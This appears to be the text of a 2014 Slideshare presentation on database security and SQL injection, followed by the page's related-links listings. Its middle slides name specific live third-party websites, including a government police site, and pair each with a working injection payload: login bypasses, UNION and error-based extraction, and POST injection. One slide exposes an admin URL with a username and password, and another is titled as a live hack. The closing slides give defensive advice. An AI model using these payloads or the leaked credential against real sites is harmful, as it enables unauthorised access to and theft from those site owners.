Database and Database Security..

56 %
44 %
Information about Database and Database Security..
Technology

Published on March 15, 2014

Author: rummykhan

Source: slideshare.net

Description

Database and Database Security..

DATABASE & DATABASE SECURITY BY REHAN MANZOOR

What actually is a database  Code and Filing concept +

History of Database

Major Database Vendors

Interaction with Database

How we Interact (Direct Queries)

Custom defined functions

Stored Procedures

Stored Procedures

Integration with Languages

Static Apps

Dynamic Apps

Need in CMS

How We Integrate  Well that is the real question how we integrate.. It create a problem when we don‘t attach app with a database correctly.. Code is important

Contents continued..  Database Attacks  What is a Database Attack  Explanation  OWASP Rating (damage rate)  Destruction of SQL injection  History Reviews  Recent bidding in underground

Database Attacks  Excessive Privileges  Privileges abuse  Unauthorized privilege elevation  Platform Vulnerabilities  Sql Injection  Weak Audit  Denial of Service

Top 10 vuln by OWASP

Destruction of SQL Injection Attack  Heartland Payment Systems This New Jersey payment processing firm lost data on tens of millions of credit cards in an attack in 2009. Around 175,000 businesses were affected by the theft.  TJX More than 45 million people had their credit card details stolen and some experts said the actual figure was likely to be closer to 94 million.

Recent Bidding in Underground

Login on Live Sites  http://www.equinet.ch/fr/gestion/login.php  1' OR '1'='1  http://lionsclubofwashim.co.in/admin.php  1' OR '1'='1  admin.axilbusiness.in  1' OR '1'='1  http://www.anemos.in/admin/  1' OR '1'='1  Query Code  CODE select username, password from admin where username='"+txtUserName.Text+"' and password='"+txtPassword.Text+"';

Union based attack  http://greenforce.com.pk/page.aspx?page_id=24 +UNION+ALL+SELECT+null,null,@@version,null,null,null,nul l-- -  http://www.philatourism.com/page.aspx?id=-3 UNION ALL SELECT table_name,null,null,null,null,null from information_schema.tables—  http://www.sharan.org.uk/newsdetail.aspx?ID=-7 union all select '1',null –  Code select * from tblName where id=‗‖+RequestQueryString[‗id‘]+‖‘;

Error Based Attack  http://www.vdjs.edu.in/CMS/ContentPage.aspx?id=21 and @@version>1-- -  http://www.mission-education.org/resourcelist.cfm?audience_ID=5 and 1=convert(int,@@version)-- -&category_id=2  http://www.grabbbit.com/Product.aspx?console_id=3' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='adminlogin' and column_name not in ('id','userid','password','admin_role_id')))--&type=Preown  http://www.grabbbit.com/admin/login.aspx  userid admin  password grabbbit$  Code  Select column1,column2,column3, from table1 join table2 on table1.column1 = table2.column1 where id=‗‖+RequestQueryString[‗id‘]+‖‘;

Blind Attack  fgcineplex.com.sg/Images/slideshow/sizzlings oul.php  Code well query is same here like union but problem is with labels here.. Their designer could are not picked.. Either they are also stored in database or they they cannot work with union

POST Sql Injection  url:  http://haryanapolice.gov.in/police/pressreleases/s earch.asp  Post  text1=rummy'&text2=11/11/2010&SUBMIT=search  Code select * from tablename where text1= Request.Form[―text1"].ToString() and text2= Request.Form[―text1"].ToString();

Why Sql Injection Possible  Who is responsible Database or Programmer  Why Not To Blame Database  Database Secure Nature  Lack of awareness  No research base study  Lack of interest  Non professional coders

Detection of SQL Injection  Manual Check  Why  How  By Whom  Automated Check  Tools  Scanners

Securing From SQL Injection  Learn About it  Firewalls  By Code  Don‘t Disclose any parameter as possible  Giving session user least possible rights  Blacklisting evil keywords for the session user  User input validation  Using prepared statements

More on Firewalls  USE Of Firewall  As it is  Customized  Buffer overflows  Null bytes  Difference between a normal user and Hacker

Buffer Overflows  Live example  https://www.qmensolutions.com/remote_suppo rt_packs.php?packs=9%27--%20-  Bypassing from keyword

Live Hack Of A Website  http://aquaservices.co.in/

Conclusion  Although databases and their contents are vulnerable to a host of internal and external threats, it is possible to reduce the attack vectors to near zero. By addressing these threats you will meet the requirements of the most regulated industries in the world.

Add a comment

Related presentations

Presentación que realice en el Evento Nacional de Gobierno Abierto, realizado los ...

In this presentation we will describe our experience developing with a highly dyna...

Presentation to the LITA Forum 7th November 2014 Albuquerque, NM

Un recorrido por los cambios que nos generará el wearabletech en el futuro

Um paralelo entre as novidades & mercado em Wearable Computing e Tecnologias Assis...

Microsoft finally joins the smartwatch and fitness tracker game by introducing the...

Related pages

Security-Database

Security-Database help your corporation foresee and avoid any security risks that may impact your IT infrastructure and business applications.
Read more

Oracle Database Security | Oracle

Discover how Oracle's Database Security solutions can help to ensure data privacy, protect against insider threats, and enable regulatory compliance.
Read more

20 Database Security - Oracle

Introduction to Database Security. Database security entails allowing or disallowing user actions on the database and the objects within it. Oracle uses ...
Read more

Database security - Wikipedia

Database security concerns the use of a broad range of information security controls to protect databases (potentially including the data, the database ...
Read more

Oracle Database Security - Products | Oracle

Why Oracle Database Security? From the outset, Oracle has delivered the industry's most advanced technology to safeguard data at the source ...
Read more

Database Security | Intel Security Products

Strengthen database security with real-time database activity monitoring, virtual patching, and database vulnerability scanning that secures physical ...
Read more

SQL Database Security Overview - azure.microsoft.com

Learn about Azure SQL Database and SQL Server security, including the differences between the cloud and SQL Server on-premises when it comes to ...
Read more

Space: Database Security - General | Oracle Community

Database Security - General has no featured content yet. To feature content, go to the discussion, document, or blog post you want to feature and click ...
Read more

PHP: Database Security - Manual

Database Security Table of Contents. Designing Databases; Connecting to Database; Encrypted Storage Model; SQL Injection; Nowadays, databases are cardinal ...
Read more

Database Security - Intel Security-McAfee—Antivirus ...

Bedeutung virtueller Patches. Mit Datenbank-Sicherheitslösungen von Intel Security können Sie Datenbankschwachstellen effizient und ohne Ausfallzeiten ...
Read more